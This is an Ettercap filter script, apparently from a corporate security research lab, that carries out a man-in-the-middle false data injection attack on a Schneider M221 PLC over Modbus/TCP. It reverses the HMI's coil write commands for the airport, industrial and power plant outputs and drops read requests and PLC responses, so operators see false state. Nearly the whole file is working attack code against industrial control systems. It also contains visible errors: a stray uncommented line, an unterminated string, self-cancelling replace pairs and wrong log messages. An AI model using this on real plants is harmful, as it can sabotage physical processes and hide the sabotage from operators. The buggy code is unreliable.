#-----------------------------------------------------------------------------
# Name:        m221_1 filter
#
# Purpose:     This filter is used to do the fake data injection attack for the 
#              Schneider m221 PLC system.(IP 192.168.10.72)<-> 192.168.10.21
# Author:      Yuancheng Liu
#
# Created:     2019/09/09
# Copyright:   YC @ Singtel Cyber Security Research & Development Laboratory
# License:     YC
#-----------------------------------------------------------------------------

#Reverse the memory change signal from HMI to PLC.
if (ip.proto == TCP  && tcp.dst == 502 && ip.dst == '192.168.10.72') {

    # M10 -> Q0.0 Airport LED
    if (search(DATA.data ,"\x0f\x00\x0a\x00\x01\x01\x00")) {
        replace("\x0f\x00\x0a\x00\x01\x01\x00", "\x0f\x00\x0a\x00\x01\x01\x01");
        msg("Reverse Airport LED off request.\n");
    }
    if (search(DATA.data ,"\x0f\x00\x0a\x00\x01\x01\x01")) {
        replace("\x0f\x00\x0a\x00\x01\x01\x01", "\x0f\x00\x0a\x00\x01\x01\x00");
        msg("Reverse Airport LED on request.\n");
    }

    # M60 -> Q0.2 Industrial LED
    if (search(DATA.data ,"\x0f\x00\x3c\x00\x01\x01\x00")) {
        replace("\x0f\x00\x3c\x00\x01\x01\x00", "\x0f\x00\x3c\x00\x01\x01\x01");
        msg("Reverse Industrial LED off request.\n");
    }

    if (search(DATA.data ,"\x0f\x00\x3c\x00\x01\x01\x01")) {
        replace("\x0f\x00\x3c\x00\x01\x01\x01", "\x0f\x00\x3c\x00\x01\x01\x00");
        msg("Reverse Industrial LED off request.\n");
    }

    M0 -> Q0.1 Power Plant
    if (search(DATA.data ,"\x0f\x00\x00\x00\x01\x01\x00")) {
        replace("\x0f\x00\x00\x00\x01\x01\x00", "\x0f\x00\x00\x00\x01\x01\x01");
        msg("Power Plant LED off request.\n");
    }

    if (search(DATA.data ,"\x0f\x00\x00\x00\x01\x01\x01")) {
        replace("\x0f\x00\x00\x00\x01\x01\x01", "\x0f\x00\x00\x00\x01\x01\x00");
        msg("Power Plant LED off request.\n");
    }
}

# Drop the memory change signal from HMI to PLC.
if (ip.proto == TCP  && tcp.dst == 502 && ip.dst == '192.168.10.72')  {
    # Drop the PLC response.
    if (search(DATA.data ,"\x00\x00\x00\x00\x00\x08\x01\x01")) {
        drop();
        msg("Drop the read request!\n");
    }
}

#Reverse the PLC response to HMI.
if (ip.proto == TCP && tcp.dst == 502 && ip.dst == '192.168.10.21') {
    # Drop the PLC response.
    if (search(DATA.data ,"\x01\x08\")) {
        drop();
        msg("Drop the response!\n");
    }
}
